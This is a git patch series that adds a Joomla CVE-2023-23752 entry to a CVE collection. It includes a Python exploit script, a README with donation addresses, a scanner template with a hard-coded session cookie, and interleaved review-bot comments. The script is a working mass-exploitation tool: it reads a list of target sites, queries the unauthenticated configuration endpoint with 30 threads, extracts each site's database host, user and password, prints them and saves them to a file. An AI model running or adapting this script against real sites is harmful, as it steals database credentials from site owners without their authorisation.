From 84317197629ad5e16272b1cf0a45bec071a5b81a Mon Sep 17 00:00:00 2001
From: maoran
Date: Wed, 15 Mar 2023 15:48:42 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../2023/CVE-2023-23752/CVE-2023-25136.py | 41 +++++++++++++++++++
 cve/openssl/2023/CVE-2023-23752/README.md | 14 +++++++
 cve/openssl/2023/yaml/CVE-2023-23752.yaml | 40 ++++++++++++++++++
 openkylin_list.yaml | 1 +
 4 files changed, 96 insertions(+)
 create mode 100644 cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
 create mode 100644 cve/openssl/2023/CVE-2023-23752/README.md
 create mode 100644 cve/openssl/2023/yaml/CVE-2023-23752.yaml
diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
new file mode 100644
index 00000000..59ef149d
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
@@ -0,0 +1,41 @@
+#An issue was discovered in Joomla! 4.0.0 through
+#4.2.7. An improper access check allows
+#unauthorized access to webservice endpoints.
+import requests,time,re,random,os,sys,json
+from multiprocessing.dummy import Pool as ThreadPool
+from colorama import Fore,Style, init
+init(autoreset=True)
+
+r = Fore.RED + Style.BRIGHT
+g = Fore.GREEN + Style.BRIGHT
+c = Fore.CYAN + Style.BRIGHT
+y = Fore.YELLOW + Style.BRIGHT
+o = Fore.RESET + Style.RESET_ALL
+
+
+def jomprv(url):
+ try:
+ headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/101.0.4951.61 Mobile Safari/537.36'}
+ asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
+ if 'dbtype' in asw.content:
+ hoset = re.findall('"host":"(.*?)"',asw.content)[0]
+ debst = re.findall('"db":"(.*?)"',asw.content)[0]
+ uset = re.findall('"user":"(.*?)"',asw.content)[0]
+ paset = re.findall('"password":"(.*?)"',asw.content)[0]
+ print ("Domaij" + " : " + url)
+ print (g + "HOST" + " : " + hoset)
+ print (g + "DB" + " : " + debst)
+ print (g + "User" + " : " + uset)
+ print (g + "Pass" + " : " + paset)
+ open('res.txt', 'a').write('\n!== Results Joomla CVE-2023-23752 ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
+ else:
+ print(r+ 'BAD' + ' ' + url)
+ #for res in regex:
+ except:
+ pass
+print "{}JOOMLA! CVE-2023-23752 | Shin Code\n".format(y)
+url = open(raw_input(o+'List:~# '),'r').read().splitlines()
+pool = ThreadPool(int(30))
+pool.map(jomprv, url)
+pool.close()
+pool.join()
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/openssl/2023/CVE-2023-23752/README.md
new file mode 100644
index 00000000..f6c41690
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-23752/README.md
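Review bot: In `jomprv`, the `open('res.txt', 'a').write(...)` line appends the recovered database host, user and password to a file in the working directory in cleartext, and the `print (g + "Pass" + " : " + paset)` line echoes the same password to the terminal. For a verification script kept in a CVE collection, a match on `'dbtype'` is enough to confirm the exposure. The secret itself should not be stored or displayed, for example by setting `paset = '<redacted>'` right after the `re.findall` line or by dropping the `PASS` field from both outputs. The bare `except: pass` around the whole body also means a failed request produces no output at all, so an unreachable host cannot be told apart from one that was never checked; catching `requests.RequestException` and printing the URL with an error marker would make the result unambiguous.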
@@ -0,0 +1,14 @@
+# Joomla-CVE-2023-23752
+python 2.7
+
+Buy Coffee :
+
+Bitcoin $: 31mtLHqhaXXyCMnT2EU73U8fwYwigiEEU1
+
+Perfect Money $: U22270614
+
+Saweria $: https://saweria.co/Shin403
+
+Trakteer $: https://trakteer.id/shin403
+
+![Screenshot_2023-03-11-18-20-57-172-edit_com termux](https://user-images.githubusercontent.com/59664965/224481416-8fd859c7-ecb3-40e9-9730-2187b2ca388a.jpg)
diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
new file mode 100644
index 00000000..a8187499
--- /dev/null
+++ b/cve/openssl/2023/yaml/CVE-2023-23752.yaml
@@ -0,0 +1,40 @@
+id: CVE-2023-23752
+
+info:
+ name: CVE-2023-23752-joomla
+ author: hakimi
+ severity: high
+ description: description
+ reference:
+ - https://cve.report/CVE-2023-23752
+ tags: CVE-2023-23752
+
+requests:
+ - raw:
+ - |+
+ GET /api/index.php/v1/config/application?public=true HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "links"
+ - '"password":'
+
+ - type: word
+ part: body
+ words:
+ - "attributes"
+
+ - type: status
+ status:
+ - 200
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401df..bb775b10 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -80,6 +80,7 @@ cve:
 - CVE-2023-25136
 - CVE-2021-3449
 - CVE-2022-0778
+ - CVE-2023-23752
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
-- Gitee
From dd03178f85cae4f894ffca01905abd5957e5998e Mon Sep 17 00:00:00 2001
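Review bot: The raw request in `cve/openssl/2023/yaml/CVE-2023-23752.yaml` carries a hard-coded `Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3` header, which looks like a session value captured during the author's own test. The finding is about access without authentication, so the check should send no cookie at all; otherwise a match does not show that the endpoint answers an anonymous client, and a captured session identifier ends up stored in the repository. Delete that header line. `description: description` is a placeholder as well and should carry a real sentence, for example the one already used in the script header: `An improper access check in Joomla! 4.0.0 through 4.2.7 allows unauthorized access to webservice endpoints.`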
From: maoran
Date: Wed, 15 Mar 2023 17:56:47 +0800
Subject: [PATCH 2/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-23752?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../2023/CVE-2023-23752/CVE-2023-23752.py} | 0
 cve/{openssl => joomla}/2023/CVE-2023-23752/README.md | 0
 cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml | 0
 openkylin_list.yaml | 2 ++
 4 files changed, 2 insertions(+)
 rename cve/{openssl/2023/CVE-2023-23752/CVE-2023-25136.py => joomla/2023/CVE-2023-23752/CVE-2023-23752.py} (100%)
 rename cve/{openssl => joomla}/2023/CVE-2023-23752/README.md (100%)
 rename cve/{openssl => joomla}/2023/yaml/CVE-2023-23752.yaml (100%)
diff --git a/cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py b/cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py
similarity index 100%
rename from cve/openssl/2023/CVE-2023-23752/CVE-2023-25136.py
rename to cve/joomla/2023/CVE-2023-23752/CVE-2023-23752.py
diff --git a/cve/openssl/2023/CVE-2023-23752/README.md b/cve/joomla/2023/CVE-2023-23752/README.md
similarity index 100%
rename from cve/openssl/2023/CVE-2023-23752/README.md
rename to cve/joomla/2023/CVE-2023-23752/README.md
diff --git a/cve/openssl/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml
similarity index 100%
rename from cve/openssl/2023/yaml/CVE-2023-23752.yaml
rename to cve/joomla/2023/yaml/CVE-2023-23752.yaml
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index bb775b10..35e701bc 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -79,7 +79,9 @@ cve:
 - CVE-2022-3602
 - CVE-2023-25136
 - CVE-2021-3449
+ joomla:
 - CVE-2022-0778
+
 - CVE-2023-23752
 libxml2:
 - CVE-2020-24977
-- Gitee
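Review bot: In the `openkylin_list.yaml` hunk the new `joomla:` key is inserted one entry too early, above `- CVE-2022-0778`, so that entry moves out of the preceding list and into `joomla` together with `- CVE-2023-23752`. The preceding list is apparently the openssl one, since patch 1 filed the new entry under `cve/openssl`. Going by the hunk header's 7/9 line counts, the second added line is a blank line between the two entries rather than a new list item. Place `joomla:` directly above `- CVE-2023-23752`, leave `- CVE-2022-0778` as the last item of the list above it, and drop the added blank line. The mapping continues outside the hunk, so the name of the preceding key should be confirmed against the full file.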